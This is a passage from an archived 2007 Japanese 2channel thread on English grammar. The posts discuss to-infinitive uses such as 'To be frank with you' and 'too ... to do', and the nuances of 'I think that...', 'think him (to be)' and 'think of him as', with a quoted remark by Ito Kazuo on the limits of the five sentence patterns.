388.(to不定詞:副詞的用法−独立用法)
M2((To be frank with you)), / S / are / ((a little)) ((too)) C / to v. (文型:S V C to do)

最初の to不定詞は、文修飾の副詞的用法で、後ろの to不定詞は、「形容詞+to不定詞」です。

文修飾の独立用法については、例文387参照。

「be anxious to do」のように、形容詞には、後ろに to不定詞がくるものがあります(例文378参照)。
副詞的用法と考えても良いでしょうが、「形容詞+to不定詞」として形容詞とセットで憶える方が良いと思います。
該当箇所:
「§219 to不定詞の副詞用法、[2] 形容詞・副詞を修飾する用法、(1) 形容詞を補う」
「§122 形容詞と to不定詞構文、(5) 「しきりに〜したがっている」型」

859 :名無しさん@英語勉強中:2007/02/23(金) 00:28:28
>>857
think の使い分け、ありがとうございます。
手元の辞書だけだと載ってなかったもので。
PEUは躊躇しちゃうけど、ちゃんとした文法書買おうかな。

あと、文型にこだわりすぎるのはよくないですね。
↓を思い出して引っ張り出してきました。

---
5文型というのは、英語の文章の大部分を説明するには
よい方法だけれど、だからといって5文型で英語の文章のすべてが
説明できるなどとは誰も言っていない。
文法で説明できないときは、文法を離れて英語そのものがわかることを
目指せばいいんだ。(伊藤和夫の英語勉強法p.32)
---

伊藤によれば、説明のための「便法」に過ぎない文法を絶対視すると、
He is in the room. の in the room は副詞句か補語かといった
不毛な議論に落ち込むので意味がない、とのこと。

860 :名無しさん@英語勉強中:2007/02/23(金) 07:34:27
>>856が的を得てるな。訳順は逆だけど。

>>857
>(a) I think (that) he is a genius.
>(a):最も自然な表現。ただし、直接的な経験に基づくとは限らず、間接的な伝聞に基づく判断の場合がある。
はthat節がくるからだろうな。断定文(He is a genius.)にI thinkとつけて語調を和らげたり、断言を避けたり、
自分の思うにはこうだって場合に使うこともある。

(b)(c)が(a)と全く違うのは、(a)は漠然とthat節にくる伝文をthinkしているが
(b)(c)は一義的にはhimをthinkした上でhim (to be) a genius(He is a genius)と言及している。

>(d) I think of him as a genius.
>(d):ややインフォーマル。ある側面を特定的に取り上げて言及する。
インフォーマルかどうかはともかく、「ある側面」を取り上げると言わしめてるのはofの存在だろうな。

これだけofがつく。他の文はつかない。

別に他動詞自動詞とかそういうレベルの話ではないけどね。

861 :名無しさん@英語勉強中:2007/02/23(金) 11:20:08
ここで質問すんのやめてくれ

862 :名無しさん@英語勉強中:2007/02/23(金) 11:58:22
バカヤロ。勝手口先生に質問できるのは2ちゃん広しと言えどもこのスレだけなんだぞ!

863 :名無しさん@英語勉強中:2007/02/23(金) 12:09:25
というか俺は工口先生の解説も聞いてみたいんだが。
難癖をつける形じゃなくて。

864 :名無しさん@英語勉強中:2007/02/23(金) 15:32:47
死ね

356 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)